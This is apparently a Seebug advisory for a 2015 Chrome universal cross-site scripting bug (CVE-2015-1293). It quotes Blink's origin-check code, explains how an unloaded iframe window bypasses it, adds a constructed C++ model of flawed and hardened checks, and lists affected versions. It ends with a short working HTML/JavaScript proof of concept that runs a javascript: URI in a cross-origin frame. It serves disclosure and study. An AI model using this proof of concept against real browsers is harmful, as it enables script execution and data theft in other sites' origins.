Seebug SSV:93033 (Root)

Chrome Universal XSS by loading a javascript: URI from an unloaded window (CVE-2015-1293)

Published: 2017-04-24 | Root | www.seebug.org
EPSS: 0.011 (Low), percentile 83.0%

VULNERABILITY DETAILS

From /WebKit/Source/core/frame/DOMWindow.cpp:

bool DOMWindow::isInsecureScriptAccess(LocalDOMWindow& callingWindow, const String& urlString)
{
    if (!protocolIsJavaScript(urlString))
        return false;

    // If this DOMWindow isn't currently active in the Frame, then there's no
    // way we should allow the access.
    if (isCurrentlyDisplayedInFrame()) {
        // FIXME: Is there some way to eliminate the need for a separate "callingWindow == this" check?
        if (&callingWindow == this)
            return false;

        // FIXME: The name canAccess seems to be a roundabout way to ask "can execute script".
        // Can we name the SecurityOrigin function better to make this more clear?
        if (callingWindow.frame()->securityContext()->securityOrigin()->canAccessCheckSuborigins(frame()->securityContext()->securityOrigin()))
            return false;
    }

    callingWindow.printErrorMessage(crossDomainAccessErrorMessage(&callingWindow));
    return true;
}

|callingWindow| may be an unloaded window (for example the window of an iframe's initial document after the frame has navigated away from it) whose associated |frame()| now holds another, potentially cross-origin document. The origin comparison above reads the caller's origin from |callingWindow.frame()->securityContext()|, that is, from the document currently in the frame rather than from the calling window's own document, so it compares that document's origin with itself and passes. As a result, the security check can be bypassed and the javascript: URI executes in the cross-origin document.
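
The bookkeeping behind this bypass, as an added model that is not Blink code: a frame's security context follows whatever document it currently displays, while a window created for an earlier document keeps pointing at the same frame. The hardened variant, which takes the caller's origin from the caller's own document, is an assumption modelled on how later Blink code performs this check, not a quotation of the actual fix; all struct names and origins are constructed.

```cpp
#include <string>

// Added model, not Blink code: a Frame points at the document it currently
// displays; a Window keeps the document it was created for plus the frame it
// lived in, and an old window still points at that frame after a navigation.
struct Document { std::string origin; };
struct Frame { const Document* currentDocument; };   // ~ frame()->securityContext()
struct Window {
    Frame* frame;                                    // ~ frame()
    const Document* document;                        // ~ document()
    bool isCurrentlyDisplayedInFrame() const { return frame->currentDocument == document; }
};
static bool protocolIsJavaScript(const std::string& url) { return url.rfind("javascript:", 0) == 0; }
static bool canAccess(const Document& a, const Document& b) { return a.origin == b.origin; }

// Shape of the check in the report: the caller's origin is taken from its
// frame's *current* security context, i.e. whatever document is in the frame now.
bool isInsecureScriptAccessVulnerable(const Window& target, const Window& calling, const std::string& url) {
    if (!protocolIsJavaScript(url)) return false;
    if (target.isCurrentlyDisplayedInFrame()) {
        if (&calling == &target) return false;
        if (canAccess(*calling.frame->currentDocument, *target.frame->currentDocument)) return false;
    }
    return true;   // insecure: the javascript: load is refused
}

// Hardened shape (assumed, modelled on later Blink code): the caller's origin
// comes from the caller's own document, which a later navigation cannot change.
bool isInsecureScriptAccessHardened(const Window& target, const Window& calling, const std::string& url) {
    if (!protocolIsJavaScript(url)) return false;
    if (target.isCurrentlyDisplayedInFrame()) {
        if (&calling == &target) return false;
        if (canAccess(*calling.document, *target.frame->currentDocument)) return false;
    }
    return true;
}

// Scenario from the report: the iframe's initial window (same origin as the top
// page) stays reachable after the frame navigates to a cross-origin document.
struct Verdict { bool vulnerableRefuses; bool hardenedRefuses; };
Verdict unloadedWindowScenario() {
    Document initial{"https://origin-a.example"}, navigated{"https://abc.xyz"};  // constructed
    Frame iframe{&initial};
    Window unloaded{&iframe, &initial};     // created for the initial document
    iframe.currentDocument = &navigated;    // frame now shows the cross-origin page
    Window current{&iframe, &navigated};    // the window location.replace() acts on
    const std::string url = "javascript:alert(location)";
    return {isInsecureScriptAccessVulnerable(current, unloaded, url),
            isInsecureScriptAccessHardened(current, unloaded, url)};
}
```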

VERSION

Chrome 44.0.2403.157 (Stable)
Chrome 45.0.2454.46 (Beta)
Chrome 46.0.2486.0 (Dev)
Chromium 47.0.2493.0 (Release build compiled today)

REPRODUCTION CASE

<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
var f = frames[0].Function;
i.onload = function() {
  f("location.replace('javascript:alert(location)')")();
}
i.src = 'https://abc.xyz';
</script>